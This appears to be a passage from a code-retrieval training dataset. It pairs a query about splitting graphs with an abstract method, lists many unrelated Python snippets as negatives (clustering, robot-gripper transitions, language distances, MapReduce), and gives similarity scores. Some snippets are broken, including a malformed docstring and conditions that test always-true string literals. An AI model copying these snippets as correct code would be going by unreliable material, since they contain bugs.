"def reduce_archive(self):\n distance_dict = dict()\n clusters = []\n for i, pop1 in enumerate(self.archive):\n clusters.append([pop1])\n for j in range(i + 1, len(self.archive)):\n pop2 = self.archive[j]\n distance_dict[(pop1, pop2)] = np.linalg.norm(pop1.objective_values - pop2.objective_values, 2)\n while len(clusters) > self.archive_size:\n min_distance = np.inf\n min_clusters = (np.nan, np.nan)\n for i, cluster1 in enumerate(clusters):\n for j in range(i + 1, len(clusters)):\n cluster2 = clusters[j]\n distance = SPEA.cluster_distance(cluster1, cluster2, distance_dict)\n if distance < min_distance:\n min_distance = distance\n min_clusters = (i, j)\n cluster1 = clusters.pop(max(min_clusters))\n cluster2 = clusters.pop(min(min_clusters))\n clusters.append(cluster1 + cluster2)\n self.archive = []\n for cluster in clusters:\n self.archive.append(self.cluster_centroid(cluster, distance_dict))",
"def default_action(self):\n pass",
"def __mul__(self, dist):\n return CombinedDistribution(self, dist, mul)",
"def main(rules, antecedent_prefix, consequent_prefix, deltas_prefix):\n _main(rules, antecedent_prefix, consequent_prefix, deltas_prefix)",
"def get_state_actions_mapping(self):\n return None",
"def process(self, *args, **kwargs):\n from copy import copy\n\n # set default values\n options = copy(self._process_default_options_)\n options.update(kwargs)\n\n condensed_output = (options['list_of_outputs'] is False and\n not options['full_output'])\n\n if condensed_output:\n options['list_of_outputs'] = True\n options['only_accepted'] = True\n\n result = super(Transducer, self).process(*args, **options)\n\n if (condensed_output and not result or\n not options['full_output'] and result is None):\n raise ValueError(\"Invalid input sequence.\")\n if condensed_output and len(result) >= 2:\n raise ValueError(\"Found more than one accepting path.\")\n\n if condensed_output:\n return result[0]\n return result",
"def combiner(x):\n return x",
"def feature_dist_func_dict():\n return {\"tanimoto_dissimilarity\": tanimoto_dissimilarity}",
"def choose_best_action(self, s):\r\n raise NotImplemented()",
"def _doReduce(self, func):\n name = \"Reducer\"\n sys.stderr.write(\"Master[%s phase]: starting\\n\" % name)\n proc = [mp.Process(target=spawn_reducer(func), name=name) for _ in range(self.num_workers)]\n for p in proc:\n p.daemon = True\n p.start()\n for p in proc:\n p.join()\n sys.stderr.write(\"Master[%s phase]: ended..\\n\" % name)",
"def step(self, node, default_action):\n actionToWeight = node.getActionToWeightMap()\n action = util.selectRandomKey(actionToWeight, default_action)\n return node.getSuccAfterExpand(action)",
"def state_encod_arch2(self, state, action):",
"def passivize(rule):\n rule[\"mother\"][\"subcat\"] = {\n \"obj\": None,\n \"preps\": {\n \"by\": [[\"*Subj\"]]}}\n\n rule[\"mother\"][\"hooks\"] = {\n \"head\": [\"*Obj\"]}\n\n rule[\"dtrs\"][0][\"subcat\"] = {\n \"obj\": [\"*Obj\"]}\n\n rule[\"dtrs\"][0][\"hooks\"] = {\n \"subj\": [\"*Subj\"]}\n\n return rule",
"def transition_function(state, action):\n results = []\n\n if action.action_type == Action.NOOP:\n results.append((state, 1.0))\n\n elif action.action_type == Action.GRASP:\n # point distribution for success mixed with point distribution for failure\n alpha = 0.8\n\n # success - gripper moves to object position and holds object\n success_state = deepcopy(state)\n obj = utils.get_object(success_state, action.name)\n if obj is None:\n alpha = 0\n else:\n gripper = utils.get_object(success_state, 'gripper')\n if obj.__class__ == Drawer:\n gripper.x = obj.x + (obj.width - 1)/2 + 1\n gripper.y = obj.y\n gripper.z = 2\n else:\n gripper.x = obj.x\n gripper.y = obj.y\n gripper.z = obj.z\n gripper.holding = obj.name\n gripper.closed = True\n\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n elif action.action_type == Action.PLACE:\n gripper = utils.get_object(state, 'gripper')\n new_z = utils.ray_trace(action.position.x, action.position.y)\n\n # point distribution for success mixed with point distribution for failure\n alpha = 0.8\n\n # success - gripper moves to place position and releases object\n success_state = deepcopy(state)\n obj = utils.gripper_object(success_state)\n gripper_move = utils.get_object(success_state, 'gripper')\n if obj is not None and obj.__class__ == Drawer:\n alpha = 0\n else:\n if obj is not None:\n if obj.__class__ == Container:\n obj.x = action.position.x + obj.x - gripper_move.x\n obj.y = action.position.y + obj.y - gripper_move.y\n else:\n obj.x = action.position.x\n obj.y = action.position.y\n obj.z = new_z\n gripper_move.x = action.position.x\n gripper_move.y = action.position.y\n gripper_move.z = new_z\n gripper_move.closed = False\n gripper_move.holding = ''\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n elif action.action_type == Action.OPEN_GRIPPER:\n gripper = utils.get_object(state, 'gripper')\n if not gripper.closed:\n results.append((state, 1.0))\n else:\n success_state = deepcopy(state)\n gripper = utils.get_object(state, 'gripper')\n gripper.closed = False\n obj = utils.gripper_object(success_state)\n if obj is None:\n results.append((success_state, 1.0))\n else:\n states = [success_state]\n probs = [1.0]\n prob_sum = 0\n decay = 1.0\n for z in range(obj.z - 1, -1, -1):\n decay *= 0.8\n if obj.__class__ == Item:\n for i in range(obj.z - z, obj.z + z + 1):\n for j in range(obj.z - z, obj.z + z + 1):\n states.append(utils.copy_state_move_object(success_state, obj.unique_name, i, j, z - obj.z))\n p = 1.0/(pow(2*(obj.z - z) + 1, 2))\n p *= decay\n probs.append(p)\n prob_sum += p\n elif obj.__class__ == Container:\n for i in range(int((obj.z - z)/2), int((obj.z + z)/2) + 1):\n for j in range(int((obj.z - z)/2), int((obj.z + z)/2) + 1):\n states.append(utils.copy_state_move_object(success_state, obj.unique_name, i, j, z - obj.z))\n p = 1.0/(pow(2*(int((obj.z - z)/2)) + 1, 2))\n p *= decay\n probs.append(p)\n prob_sum += p\n elif obj.__class__ == Lid:\n states.append(utils.copy_state_move_object(success_state, obj, 0, 0, z - obj.z))\n probs.append(decay)\n for i in range(len(probs)):\n probs[i] /= prob_sum\n results.extend(zip(states, probs))\n\n elif action.action_type == Action.CLOSE_GRIPPER:\n gripper = utils.get_object(state, 'gripper')\n if gripper.closed:\n results.append((state, 1.0))\n else:\n success_state = deepcopy(state)\n gripper = utils.get_object(state, 'gripper')\n gripper.closed = True\n if 'gripper_on_apple' 
and 'gripper_level_with_apple':\n gripper.holding = 'apple'\n results.append((success_state, 1.0))\n elif 'gripper_on_batteries' and 'gripper_level_with_batteries':\n gripper.holding = 'batteries'\n results.append((success_state, 1.0))\n elif 'gripper_on_flashlight' and 'gripper_level_with_flashlight':\n gripper.holding = 'flashlight'\n results.append((success_state, 1.0))\n elif 'gripper_on_granola' and 'gripper_level_with_granola':\n gripper.holding = 'granola'\n results.append((success_state, 1.0))\n elif 'gripper_on_knife' and 'gripper_level_with_knife':\n gripper.holding = 'knife'\n results.append((success_state, 1.0))\n elif 'gripper_on_small' and 'gripper_level_with_small':\n gripper.holding = 'small'\n results.append((success_state, 1.0))\n elif 'gripper_on_lid' and 'gripper_level_with_lid':\n failure_state = deepcopy(success_state)\n gripper.holding = 'lid'\n results.append((success_state, 0.1))\n results.append((failure_state, 0.9))\n elif 'gripper_touching_drawer' and 'gripper_right_of_drawer' and 'gripper_level_with_drawer':\n failure_state = deepcopy(success_state)\n gripper.holding = 'drawer'\n results.append((success_state, 0.2))\n results.append((failure_state, 0.8))\n elif 'gripper_on_large' and 'gripper_level_with_large':\n failure_state = deepcopy(success_state)\n gripper.holding = 'large'\n results.append((success_state, 0.875))\n results.append((failure_state, 0.125))\n\n elif action.action_type == Action.MOVE_ARM:\n pass\n\n elif action.action_type == Action.RAISE_ARM:\n alpha = 1.0\n gripper = utils.get_object(state, 'gripper')\n if 'gripper_on_lid' in state.relations and 'gripper_below_lid' in state.relations:\n alpha *= 0.8\n if 'gripper_on_drawer' in state.relations and 'gripper_below_drawer' in state.relations:\n alpha *= 0.8\n if 'gripper_on_stack' in state.relations and 'gripper_below_stack' in state.relations:\n alpha *= 0.8\n if 'gripper_on_small' in state.relations and 'gripper_below_small' in state.relations:\n alpha *= 0.8\n if 'gripper_on_large' in state.relations and 'gripper_below_large' in state.relations:\n alpha *= 0.8\n if gripper.holding in ['lid', 'small', 'large']:\n alpha *= 0.8\n success_state = deepcopy(state)\n gripper = utils.get_object(success_state, 'gripper')\n gripper.z += 1\n if gripper.z > 4:\n gripper.z = 4\n obj = utils.gripper_object(success_state)\n obj.z += 1\n if obj.z > 4:\n obj.z = 4\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n elif action.action_type == Action.LOWER_ARM:\n alpha = 1.0\n if 'gripper_on_lid' in state.relations and 'gripper_level_with_lid' in state.relations \\\n or 'gripper_on_small' in state.relations and 'gripper_level_with_small' in state.relations \\\n or 'gripper_on_large' in state.relations and 'gripper_level_with_large' in state.relations:\n alpha = 0\n else:\n gripper = utils.get_object(state, 'gripper')\n if 'gripper_on_drawer' in state.relations and 'gripper_above_drawer' in state.relations:\n alpha *= 0.8\n if 'gripper_on_stack' in state.relations and 'gripper_above_stack' in state.relations:\n alpha *= 0.8\n if gripper.holding in ['lid', 'small', 'large']:\n alpha *= 0.8\n success_state = deepcopy(state)\n gripper = utils.get_object(success_state, 'gripper')\n gripper.z -= 1\n if gripper.z < 0:\n gripper.z = 0\n obj = utils.gripper_object(success_state)\n obj.z -= 1\n if obj.z < 0:\n obj.z = 0\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n elif 
action.action_type == Action.RESET_ARM:\n # point distribution for success mixed with point distribution for failure\n alpha = 0.8\n\n # success - gripper moves to object position and holds object\n success_state = deepcopy(state)\n gripper = utils.get_object(success_state, 'gripper')\n gripper.x = 8\n gripper.y = 1\n gripper.z = 2\n\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n return results",
"def _merge(reactive_system: ReactiveSystem, red_state: int, blue_state: int,\n visited_blue_states=None) -> None:\n if visited_blue_states is None:\n visited_blue_states = set()\n # mergeable_depth = _mergeable_depth(_reactive_system, red_state, blue_state)\n # if mergeable_depth is None or red_state == blue_state:\n # return\n # merge the outputs\n if blue_state in reactive_system.output:\n for action in reactive_system.output[blue_state]:\n if red_state in reactive_system.output:\n reactive_system.output[red_state][action] = reactive_system.output[blue_state][action]\n else:\n reactive_system.output[red_state] = {action: reactive_system.output[blue_state][action]}\n del reactive_system.output[blue_state]\n\n # merge the transitions\n if blue_state in reactive_system.transitions:\n if blue_state not in visited_blue_states:\n visited_blue_states.add(blue_state)\n last_available_actions = set()\n while last_available_actions != set(reactive_system.transitions[blue_state].keys()):\n last_available_actions = set(reactive_system.transitions[blue_state].keys())\n for action in last_available_actions:\n if red_state not in reactive_system.transitions:\n reactive_system.transitions[red_state] = dict()\n if action in reactive_system.transitions[red_state]:\n _merge(reactive_system, reactive_system.transitions[red_state][action],\n reactive_system.transitions[blue_state][action], visited_blue_states)\n else:\n reactive_system.transitions[red_state][action] = reactive_system.transitions[blue_state][action]\n del reactive_system.transitions[blue_state]\n for source in reactive_system.transitions:\n for action in reactive_system.transitions[source]:\n if reactive_system.transitions[source][action] == blue_state:\n reactive_system.transitions[source][action] = red_state",
"def noDistMetric():\r\n raise NotImplementedError(\"Distance metric is not supported on feature type\")\r\n return noDistMetric",
"def squeeze_accept(partition):\n Write a function that\n - Sort districts by most Democratic heavy and most Republican heavy\n\n - Assign a base value of competitiveness for each district\n - Run chain, accept only if districts satisfy values under or order\n \"\"\"\n\n#--- CONSTRAINTS\n\n\"\"\"",
"def coalesce(self, discriminator):\r\n return self.coalesce_targets([self], discriminator)",
"def doppler_redshift():\n rv_unit = si.km / si.s\n C_KMS = _si.c.to_value(rv_unit)\n\n def convert_z_to_rv(z):\n zponesq = (1 + z) ** 2\n return C_KMS * (zponesq - 1) / (zponesq + 1)\n\n def convert_rv_to_z(rv):\n beta = rv / C_KMS\n return np.sqrt((1 + beta) / (1 - beta)) - 1\n\n return Equivalency(\n [(dimensionless_unscaled, rv_unit, convert_z_to_rv, convert_rv_to_z)],\n \"doppler_redshift\",\n )",
"def apply_action(self, action):\n agent = action['action_details']['agent_id']\n current_node = self.agents_location[agent][0]\n people_collected = self.people_location.get(current_node, 0)\n self.people_location[current_node] = 0\n self.people_collected[agent] += people_collected\n self.agents[agent-1].score += people_collected\n self.agents[agent-1].location = current_node\n self.agents[agent-1].t += 1\n self.agents[agent%2].t += 1\n # self.agents_location[agent%2+1][2] = max(self.agents_location[agent%2+1][2]-1,0)\n # if self.agents_location[agent%2+1][2] == 0:\n # self.agents_location[agent%2+1][0] = self.agents_location[agent%2+1][1]\n # self.agents[agent%2].traversing = False\n # self.agents[agent%2].location = self.agents_location[agent%2+1][1]\n\n if 'expansions' in action[\"action_details\"]:\n self.agents_expansions[action[\"action_details\"]['agent_id']] += action[\"action_details\"]['expansions']\n resulting_observ = self.actions_reactions[action[\"action_tag\"]](action[\"action_details\"])\n resulting_observ['collected'] = people_collected\n return resulting_observ",
"def applyAction(state, action):\r\n if action == 'N':\r\n return (state[0] - 1, state[1])\r\n\r\n if action == 'E':\r\n return (state[0], state[1] + 1)\r\n\r\n if action == 'W':\r\n return (state[0], state[1] - 1)\r\n\r\n if action == 'S':\r\n return (state[0] + 1, state[1])",
"def applyMapping(self):\n pass",
"def _make_simple_distances():\n distances = {}\n def sym(desired, supported, strength):\n \"Define a symmetric distance between languages.\"\n desired_t = tuple(desired.split('-'))\n supported_t = tuple(supported.split('-'))\n distances[desired_t, supported_t] = strength\n distances[supported_t, desired_t] = strength\n\n def one(desired, supported, strength):\n \"Define a one-way distance between languages.\"\n desired_t = tuple(desired.split('-'))\n supported_t = tuple(supported.split('-'))\n distances[desired_t, supported_t] = strength\n\n def ok(desired, supported):\n \"Define the most common type of link: a one-way distance of 10.\"\n one(desired, supported, 10)\n\n sym('no', 'nb', 1)\n sym('hr', 'bs', 4)\n sym('sh', 'bs', 4)\n sym('sr', 'bs', 4)\n sym('sh', 'hr', 4)\n sym('sr', 'hr', 4)\n sym('sh', 'sr', 4)\n sym('ssy', 'aa', 4)\n one('gsw', 'de', 4)\n one('lb', 'de', 4)\n sym('da', 'no', 8)\n sym('da', 'nb', 8)\n ok('ab', 'ru')\n ok('ach', 'en')\n ok('af', 'nl')\n ok('ak', 'en')\n ok('ay', 'es')\n ok('az', 'ru')\n ok('az-Latn', 'ru-Cyrl')\n ok('be', 'ru')\n ok('bem', 'en')\n ok('bh', 'hi')\n ok('bn', 'en')\n ok('bn-Beng', 'en-Latn')\n ok('br', 'fr')\n ok('ceb', 'fil')\n ok('chr', 'en')\n ok('ckb', 'ar')\n ok('co', 'fr')\n ok('crs', 'fr')\n ok('cy', 'en')\n ok('ee', 'en')\n ok('eo', 'en')\n ok('et', 'fi')\n ok('eu', 'es')\n ok('fo', 'da')\n ok('fy', 'nl')\n ok('ga', 'en')\n ok('gaa', 'en')\n ok('gd', 'en')\n ok('gl', 'es')\n ok('gn', 'es')\n ok('gu', 'hi')\n ok('ha', 'en')\n ok('haw', 'en')\n ok('ht', 'fr')\n ok('hy', 'ru')\n ok('hy-Armn', 'ru-Cyrl')\n ok('ia', 'en')\n ok('ig', 'en')\n ok('is', 'en')\n ok('jv', 'id')\n ok('ka-Geor', 'en-Latn')\n ok('ka', 'en')\n ok('kg', 'fr')\n ok('kk', 'ru')\n ok('km', 'en')\n ok('km-Khmr', 'en-Latn')\n ok('kn', 'en')\n ok('kn-Knda', 'en-Latn')\n ok('kri', 'en')\n ok('ku', 'tr')\n ok('ky', 'ru')\n ok('la', 'it')\n ok('lg', 'en')\n ok('ln', 'fr')\n ok('lo', 'en')\n ok('lo-Laoo', 'en-Latn')\n ok('loz', 'en')\n ok('lua', 'fr')\n ok('mfe', 'en')\n ok('mg', 'fr')\n ok('mi', 'en')\n ok('mk', 'bg')\n ok('ml', 'en')\n ok('ml-Mlym', 'en-Latn')\n ok('mn', 'ru')\n ok('mr', 'hi')\n ok('ms', 'id')\n ok('mt', 'en')\n ok('my', 'en')\n ok('my-Mymr', 'en-Latn')\n ok('ne', 'en')\n ok('ne-Deva', 'en-Latn')\n sym('nn', 'nb', 10)\n ok('nn', 'no')\n ok('nso', 'en')\n ok('ny', 'en')\n ok('nyn', 'en')\n ok('oc', 'fr')\n ok('om', 'en')\n ok('or', 'en')\n ok('or-Orya', 'en-Latn')\n ok('pa', 'en')\n ok('pa-Guru', 'en-Latn')\n ok('pcm', 'en')\n ok('ps', 'en')\n ok('ps-Arab', 'en-Latn')\n ok('qu', 'es')\n ok('rm', 'de')\n ok('rn', 'en')\n ok('rw', 'fr')\n ok('sa', 'hi')\n ok('sd', 'en')\n ok('sd-Arab', 'en-Latn')\n ok('si', 'en')\n ok('si-Sinh', 'en-Latn')\n ok('sn', 'en')\n ok('so', 'en')\n ok('sq', 'en')\n ok('st', 'en')\n ok('su', 'id')\n ok('sw', 'en')\n ok('ta', 'en')\n ok('ta-Taml', 'en-Latn')\n ok('te', 'en')\n ok('te-Telu', 'en-Latn')\n ok('tg', 'ru')\n ok('ti', 'en')\n ok('ti-Ethi', 'en-Latn')\n ok('tk', 'ru')\n ok('tk-Latn', 'ru-Cyrl')\n ok('tlh', 'en')\n ok('tn', 'en')\n ok('to', 'en')\n ok('tt', 'ru')\n ok('tum', 'en')\n ok('ug', 'zh')\n ok('ur', 'en')\n ok('ur-Arab', 'en-Latn')\n ok('uz', 'ru')\n ok('uz-Latn', 'ru-Cyrl')\n ok('wo', 'fr')\n ok('xh', 'en')\n ok('yi', 'en')\n ok('yi-Hebr', 'en-Latn')\n ok('yo', 'en')\n ok('zu', 'en')\n sym('sr-Latn', 'sr-Cyrl', 5)\n one('zh-Hans', 'zh-Hant', 15)\n one('zh-Hant', 'zh-Hans', 19)\n sym('zh-Hant-HK', 'zh-Hant-MO', 3)\n\n return distances",
"def test_reduce(self):\n self.assertEqual(15, reduce(lambda x, y: x + y, [1, 2, 3, 4, 5]))\n self.assertEqual(16, reduce(lambda x, y: x + y, [1, 2, 3, 4, 5], 1))",
"def MapReduce(inputs, mapper, reducer):\n collector = defaultdict(list)\n\n for input in inputs:\n for key, value in mapper(input):\n collector[key].append(value)\n\n return [output\n for key, values in collector.items()\n for output in reducer(key,values)]"
] | [
"0.52857256",
"0.5162497",
"0.5107433",
"0.5057547",
"0.5027394",
"0.5027394",
"0.5027394",
"0.5027394",
"0.5027394",
"0.49870852",
"0.49124625",
"0.48178238",
"0.47693735",
"0.47630015",
"0.47151983",
"0.4696542",
"0.46933955",
"0.4672102",
"0.46205962",
"0.46201527",
"0.4614642",
"0.45813182",
"0.4547565",
"0.45459363",
"0.45360172",
"0.45087424",
"0.44910946",
"0.44584632",
"0.44497505",
"0.44495073",
"0.4433434",
"0.44123834",
"0.43926623",
"0.43869296",
"0.43854743",
"0.43777984",
"0.43438688",
"0.43420577",
"0.43416506",
"0.43183646",
"0.42923748",
"0.42864397",
"0.42713362",
"0.4264644",
"0.4260175",
"0.42580622",
"0.42545423",
"0.42484024",
"0.42401454",
"0.42368394",
"0.42367944",
"0.4232317",
"0.423111",
"0.42097294",
"0.4203806",
"0.41928",
"0.41876984",
"0.41849113",
"0.41849113",
"0.4172821",
"0.41716844",
"0.41674468",
"0.41669297",
"0.41669297",
"0.4159644",
"0.41522807",
"0.4133575",
"0.4125013",
"0.41216597",
"0.41194004",
"0.41091457",
"0.41014346",
"0.40973914",
"0.4092423",
"0.40914539",
"0.4089791",
"0.4074075",
"0.40670788",
"0.40666837",
"0.40603545",
"0.40533498",
"0.40518868",
"0.40506652",
"0.40465528",
"0.40417793",
"0.40388808",
"0.40335056",
"0.40321434",
"0.40282336",
"0.40235195",
"0.4021871",
"0.40196854",
"0.40129867",
"0.40064207",
"0.39993584",
"0.3990803",
"0.3990653",
"0.3990356",
"0.39897263",
"0.39865828"
] | 0.5502056 | 0 |
Split the graphs into two sets, those matching the distinction and those not matching. Which graphs are which are stored in a | def splitGraphs(self, graphs):
raise AbstractMethodException(self.__class__) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def compare_graphs(self):\n\t\tpass",
"def splitNodes(matching):\n outer = set(range(self.n))\n inner = set([])\n for (u, v) in matching:\n if u in outer:\n outer.remove(u)\n if v in outer:\n outer.remove(v)\n inner.add(u)\n inner.add(v)\n return list(inner), list(outer)",
"def sub_graph_merging(self):",
"def split(gt, isotropic):\n edges = get_edges(gt, isotropic)\n cytosol = edges == 0\n membrane = edges != 0\n return cytosol, membrane",
"def cleanGraph2(self,graph):\n return [graph[i] for i in range(len(graph)-1) if graphp[i]!=graph[i+1]]",
"def chang_graphs():\n g1 = Graph(\"[}~~EebhkrRb_~SoLOIiAZ?LBBxDb?bQcggjHKEwoZFAaiZ?Yf[?dxb@@tdWGkwn\",\n loops=False, multiedges=False)\n g2 = Graph(\"[~z^UipkkZPr_~Y_LOIiATOLBBxPR@`acoojBBSoWXTaabN?Yts?Yji_QyioClXZ\",\n loops=False, multiedges=False)\n g3 = Graph(\"[~~vVMWdKFpV`^UGIaIERQ`\\DBxpA@g`CbGRI`AxICNaFM[?fM\\?Ytj@CxrGGlYt\",\n loops=False, multiedges=False)\n return [g1,g2,g3]",
"def _mapped_graph_list(self,G1, sname, POWER=None):\n logger.debug(f\"Matching circuit Graph nodes: {G1.nodes} edges:{G1.edges(data=True)}\")\n mapped_graph_list = {}\n for lib_ele in self.lib:\n block_name = lib_ele['name']\n if block_name==sname:\n continue\n G2 = lib_ele['graph']\n\n # Digital instances only transistors:\n if self._is_digital(G2,sname):\n continue\n if not self._is_small(G1, G2):\n continue\n\n if len(G2.nodes)<=len(G1.nodes):\n logger.debug(f\"Matching: {block_name} : {G2.nodes} {G2.edges(data=True)}\")\n GM = isomorphism.GraphMatcher(\n G1, G2,\n node_match = isomorphism.categorical_node_match(['inst_type'],\n ['nmos']),\n edge_match = isomorphism.categorical_edge_match(['weight'], [1]))\n if GM.subgraph_is_isomorphic():\n logger.debug(f\"ISOMORPHIC : {block_name}\")\n map_list = []\n\n for Gsub in GM.subgraph_isomorphisms_iter():\n\n all_nd = [key for key in Gsub.keys() if 'net' not in G1.nodes[key][\"inst_type\"]]\n logger.debug(f\"matched inst: {all_nd}\")\n if len(all_nd)>1 and self._is_clk(Gsub) :\n logger.debug(f\"Discarding match due to clock {Gsub}\")\n continue\n elif len(all_nd)>1 and self._is_do_not_identify(Gsub,sname):\n logger.debug(f\"Discarding match due to user constraint {Gsub}\")\n continue\n \n if block_name.startswith('DP') or block_name.startswith('CMC'):\n if G1.nodes[all_nd[0]]['values'] == G1.nodes[all_nd[1]]['values'] and \\\n compare_balanced_tree(G1,get_key(Gsub,'DA'),get_key(Gsub,'DB'),[all_nd[0]],[all_nd[1]]) :\n if 'SA' in Gsub.values() and \\\n compare_balanced_tree(G1,get_key(Gsub,'SA'),get_key(Gsub,'SB'),[all_nd[0]],[all_nd[1]]):\n map_list.append(Gsub)\n logger.debug(f\"Matched Lib: {' '.join(Gsub.values())}\")\n logger.debug(f\"Matched Circuit: {' '.join(Gsub)}\")\n # remove pseudo diff pair\n elif block_name.startswith('DP') and POWER is not None and get_key(Gsub,'S') in POWER:\n logger.debug(f\"skipping pseudo DP {POWER}: {' '.join(Gsub)}\")\n else:\n map_list.append(Gsub)\n logger.debug(f\"Matched Lib: {' '.join(Gsub.values())}\")\n logger.debug(f\"Matched Circuit: {' '.join(Gsub)} power:{POWER}\")\n else:\n logger.debug(f\"Discarding match {block_name} due to non matching branches\")\n elif block_name.startswith('SCM') and G1.nodes[all_nd[0]]['values'] != G1.nodes[all_nd[1]]['values']:\n logger.debug(f\"Discarding match {block_name} due to value mismatch\")\n\n else:\n map_list.append(Gsub)\n logger.debug(f\"Matched Lib: {' '.join(Gsub.values())}\")\n logger.debug(f\"Matched Circuit: {' '.join(Gsub)}\")\n if len(map_list)>1:\n fix_order_for_multimatch(G1,map_list,map_list[-1])\n mapped_graph_list[block_name] = map_list\n\n return mapped_graph_list",
"def build_disconnected_test_graph():\n graph = build_triangle_graph()\n g2 = build_triangle_graph()\n g3 = build_triangle_graph()\n\n merge_graphs(graph, g2)\n merge_graphs(graph, g3)\n\n return graph",
"def _build_graphs(self):\n g1 = self._build_graph1()\n g2 = self._build_graph2(g1)\n return g1, g2",
"def matching_graph(n):\r\n k_n = nx.complete_graph(n)\r\n G = nx.Graph()\r\n for i in k_n.edges():\r\n G.add_node(i)\r\n w = []\r\n for i in k_n.edges():\r\n for j in k_n.edges():\r\n if ((j[0] not in i) and (j[1] not in i) and ((i,j) not in w) and ((j,i) not in w)): \r\n w.append((i,j))\r\n G.add_edge(i,j)\r\n return G",
"def obtain_groups(input_results, input_vertices):\n\tbest_first, best_second = [], []\n\tfor i in xrange(len(input_results)):\n\t\tfirst_group, second_group = best_group(input_results[i].solution, input_vertices)\n\t\tbest_first.append(first_group)\n\t\tbest_second.append(second_group)\n\n\tcomplete_first, complete_second = drop_groups(best_first, best_second)\n\n\treturn complete_first[0], complete_second[0]",
"def get_subgraphs(graph):\n nodes_powerset = get_nodes_combinations(graph)\n #print(\"Doing\")\n #draw_graph(graph)\n subgraphs = []\n for nodes in nodes_powerset:\n subg = graph.subgraph(nodes)\n nodes = subg.nodes(data=True)\n if nx.is_weakly_connected(subg):\n subgraphs.append(subg)\n return subgraphs",
"def clean_edges(self):\n for from_node in self.all_nodes():\n for to_node in self.all_nodes():\n if from_node == to_node:\n continue\n dup = list(filter(lambda x: x.from_node == from_node and x.to_node == to_node, self.edges))\n if len(dup) > 1:\n for d in dup[1:]:\n self.edges.remove(d)",
"def _delete_edges(self, to_be_deleted_set, adj_dict):\n for pair in to_be_deleted_set:\n first_node = pair[0]\n second_node = pair[1]\n adj_dict.pop((first_node, second_node), None)",
"def compare_nodes(G,all_match_pairs,match_pair,traversed,node1,node2, ports_weight):\n logger.debug(f\"comparing {node1},{node2}, traversed {traversed}\")\n nbrs1 = sorted(set(G.neighbors(node1)) - set(traversed))\n #remove dummies\n nbrs1 = sorted(set([nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=7]))\n nbrs2 = sorted(set(G.neighbors(node2)) - set(traversed))\n #remove dummies\n nbrs2 = sorted(set([nbr for nbr in nbrs2 if G.get_edge_data(node2, nbr)['weight'] !=7]))\n logger.debug(f\"node1:{node1},property: {G.nodes[node1]},neigbors1: {nbrs1}\")\n logger.debug(f\"node2:{node2},property: {G.nodes[node2]},neigbors2: {nbrs2}\")\n if not nbrs1 or not nbrs2:\n if compare_two_nodes(G, node1, node2, ports_weight):\n match_pair[node1] = node2\n logger.debug(f\"no new neihbours, returning recursion {match_pair}\")\n return\n elif len(nbrs1)> 10:\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n logger.debug(f\"skipping high fanout nets due to large computation, {node1} {nbrs1}\")\n traversed.append(node1)\n return\n elif len(nbrs2)> 10:\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n traversed.append(node2)\n logger.debug(f\"skipping high fanout nets due to large computation, {node2} {nbrs2}\")\n return\n\n if node1 == node2:\n if node1 in match_pair.keys() or node1 in match_pair.values():\n logger.debug(\"avoid existing pair wise symmetry\")\n return\n logger.debug(f\"single node {node1}, nbrs {nbrs1}, nbr_weight {[G.get_edge_data(node1,nbr) for nbr in nbrs1]}\")\n SD_nbrs= [nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=2]\n ## TBD: filter based on primitive constraints\n ## Right now will try to figure out S/D paths\n if len(SD_nbrs) ==0:\n logger.debug(f\"No SD paths found to traverse\")\n match_pair[node1]=node1\n elif len(SD_nbrs) ==1:\n logger.debug(f\"traversing single S/D path {SD_nbrs}\")\n match_pair[node1]=node1\n traversed.append(node1)\n compare_nodes(G,all_match_pairs,match_pair,traversed,SD_nbrs[0],SD_nbrs[0],ports_weight)\n else:\n logger.debug(f\" multiple nodes diverging {SD_nbrs}\")\n logger.debug(f\"nbr weights: {SD_nbrs} {[G.get_edge_data(node1, nbr)['weight'] for nbr in SD_nbrs ]}\")\n match_pair[node1]=node1\n traversed.append(node1)\n new_sp=sorted(set(SD_nbrs)-set(traversed))\n all_match_pairs_local={}\n for nbr1,nbr2 in combinations(new_sp, 2):\n logger.debug(f\"recursive pair call from single branch {nbr1} {nbr2}\")\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n if new_pair:\n #new_pair[nbr1]=nbr2\n all_match_pairs_local[nbr1+'_'+nbr2] = new_pair\n all_match_pairs_local={k: v for k, v in all_match_pairs_local.items() if len(v)>0}\n if len(all_match_pairs_local)==1:\n match_pair.update( all_match_pairs_local[list(all_match_pairs_local.keys())[0]])\n logger.debug(f\"found inline pair: {pprint.pformat(match_pair, indent=4)}\")\n else:\n for nbr1 in new_sp:\n if (nbr1+'_'+nbr1 not in all_match_pairs.keys()):\n logger.debug(f\"recursive single branch call from single branch {nbr1} {nbr1}\")\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr1,ports_weight)\n #filtering multiple axis of symmetries with same block, ideally they should be handled by array generation\n if new_pair:\n all_match_pairs[nbr1+'_'+nbr1] = new_pair\n logger.debug(f\"updating match pairs: 
